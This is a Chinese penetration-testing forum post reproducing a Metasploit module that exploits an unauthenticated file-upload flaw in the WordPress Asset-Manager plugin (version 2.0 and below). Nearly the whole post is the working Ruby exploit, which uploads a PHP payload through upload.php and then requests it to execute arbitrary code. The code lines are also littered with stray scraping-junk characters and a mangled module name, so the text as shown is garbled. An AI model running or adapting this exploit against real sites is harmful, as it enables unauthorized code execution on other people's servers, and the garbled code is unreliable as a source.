找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
返回列表 发新帖
查看: 2730|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。" ]! f. M  l$ E
3 S. u$ @2 O, C3 ?+ z  t) K
##* k9 q+ J1 w* K
# This file is part of the Metasploit Framework and may be subject to
. J8 J7 I( \6 ^* q) N# redistribution and commercial restrictions. Please see the Metasploit
. F9 G8 g/ p& B; J, |0 q7 S# Framework web site for more information on licensing and terms of use.
! _* l- n) p* t& d5 C4 b  M#   http://metasploit.com/framework/! K3 }, h: K+ g6 q, E8 u8 u! M  [
##
* l  |, M* R6 z
, v& ~& g- \+ ]6 `" irequire 'msf/core'
0 j% C+ I) d" g; c# f: urequire 'msf/core/exploit/php_exe'0 z# k* v2 |1 b( L/ f+ E
7 v# ^4 y: k" ], i. R9 [' M& ^
class Metasploit3 < Msf::Exploit::Remote
6 |$ W% c9 Y* c* e5 T  Rank = ExcellentRanking
" o) g. u* d8 u2 }' g
6 ?% ~1 ], j3 n* X  include Msf::Exploit::Remote::HttpClient
! b$ ?+ I; n* c( [8 u  include Msf::Exploit:hpEXE  U( u2 n( n  o) S* B
, m: s; T6 |; |/ r( }
  def initialize(info = {})
; c" a- s2 f2 u  Z    super(update_info(info,
# O. |6 m0 `7 R7 {  g      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',+ b% f7 o0 }) h. k
      'Description'    => %q{
% [# Z5 C7 ?7 A' R        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress& s7 L- Y4 g% B5 @; y* v' |
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a5 j: K2 Z  Y3 {, P9 g
        temp directory without authentication, which results in arbitrary code execution.9 c6 z; C. N5 Z; m  o1 O. g
      },
2 j2 s2 g  P/ ?" W2 P      'Author'         =>
8 z, M5 x$ C- F" O" w; M        [
& q! N8 P+ s. y" @1 _          'Sammy FORGIT', # initial discovery
1 P1 @  F# }2 {% |. T          'James Fitts <fitts.james[at]gmail.com>' # metasploit module. O/ V( Z8 f. b
        ],$ L  B, K" v4 V$ T
      'License'        => MSF_LICENSE,
2 G3 I$ w) O1 u8 [      'References'     =>
& Y/ L, L, j$ H0 k        [( H8 ^- `( b! U9 N" c7 ]
          [ 'OSVDB', '82653' ],
/ C6 H. m0 l, q$ \          [ 'BID', '53809' ],/ k. i8 }8 j- }; ^7 s
          [ 'EDB', '18993' ],2 _2 E! Q# z2 a/ h
          [ 'URL', 'http:// www.myhack58.com /' ]9 d' Z7 X' [, c) T
        ],
9 U. M; M8 S. ?: i      'Payload'       =>
9 b7 C: }, K& o5 r: R        {
) B. F5 P, w5 u) \& D1 A& O% d          'BadChars' => "\x00",4 Q+ T# `; f* r, i* Y
        },
+ t! J" `' b7 B( k0 u0 G2 }# q0 m  D      'Platform'       => 'php',3 _3 H( ^9 t0 u! P
      'Arch'           => ARCH_PHP,
$ p5 s7 T! u8 a+ J* n1 s      'Targets'        =>) V3 u! V8 ]7 o- y
        [
5 D. m- H( T/ g8 p$ Z6 z5 W- e          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],3 M9 i9 V3 s4 S5 s3 @/ ^; T( \. E2 h+ K
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]# `+ k! u( ]# u! R. w* L  X+ p
        ],) Z; d' x) o! t9 E4 W
      'DefaultTarget' => 0,! p8 L2 y6 a- u' w0 a/ x
      'DisclosureDate' => 'May 26 2012'))& z1 z9 ]2 `0 V: H# w6 b( D8 W
* a9 L7 ]/ s$ j5 @& ^7 ~. k
    register_options(
( j# r6 X* c5 p( ~" \: S$ ]      [
, `3 [  W7 v" L- n2 V) o: F, `4 W1 C3 Q        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])! K" o- `: V6 i7 b: n
      ], self.class)
8 h, v' [4 v' `: m$ V  end' K) `# B7 O- L/ o9 ^( D- C

8 ?% A, }  ?7 j+ K  def exploit
. l  Q. C3 a" [, e+ h    uri =  target_uri.path2 Z0 |1 U' p( l0 ]. @: t
    uri << '/' if uri[-1,1] != '/'
, A) b/ j( c2 A9 v2 z, Q5 ^3 _8 J    peer = "#{rhost}:#{rport}"
) @# s! j) }0 {' h+ _# y    payload_name = "#{rand_text_alpha(5)}.php"9 W( V3 O6 m1 d
    php_payload = get_write_exec_payload(:unlink_self=>true); z% K0 }+ x: ~  y* @! ?7 R1 J

: \- @. d! c+ _! {7 e    data = Rex::MIME::Message.new3 H! M3 h% W8 i& {- ?$ D$ r% U
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")# X# f( }, Y3 a" }' Y
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')$ D9 P- Q! u( A# K' ~; B2 e
% _. J; X8 Q( @, J
    print_status("#{peer} - Uploading payload #{payload_name}")7 {4 i: I; W# _4 w6 o
    res = send_request_cgi({% h$ |# _7 p4 n3 @/ i$ O2 w, H
      'method'  => 'POST',- ~- b5 y1 m; I0 N( ~
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
8 @6 C3 J* @: [8 J( N      'ctype'   => "multipart/form-data; boundary=#{data.bound}",& ]; S2 ?# w; C5 ?, d6 i3 l
      'data'    => post_data6 d) e% c( s, ^7 k" _
    })# I1 P% @& A+ e  t6 b5 M
& _2 X: y, G" Q& b* s5 V
    if not res or res.code != 200 or res.body !~ /#{payload_name}/+ j; `$ i4 d; ~) H
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")4 b, P2 S: c1 W! L4 o
end& [: x9 n8 J9 P, ~# i/ R3 F& k

5 V7 b9 H0 P2 O! d- T) h# @* s$ e    print_status("#{peer} - Executing payload #{payload_name}")/ A4 Y7 {: ?1 e4 a* b
    res = send_request_raw({
3 w! z! m, i6 @' x      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
8 T5 ~8 m; X& Q# {* A) {      'method'  => 'GET'
. L- _. m8 _8 U' v" N: N8 V    })* h- `+ d6 H3 x$ n- j7 Z1 T
1 o0 D) Y8 E& L* p2 d4 k
    if res and res.code != 200
$ q: U$ u6 \7 j      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
# G3 ^5 x: S5 Y1 ?    end; I) F  z# Z0 |. S7 S2 ]& [
  end
. Z  b: N2 h& C6 u0 _5 Wend
+ T" X9 d2 ~. y& M) M+ v& R
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表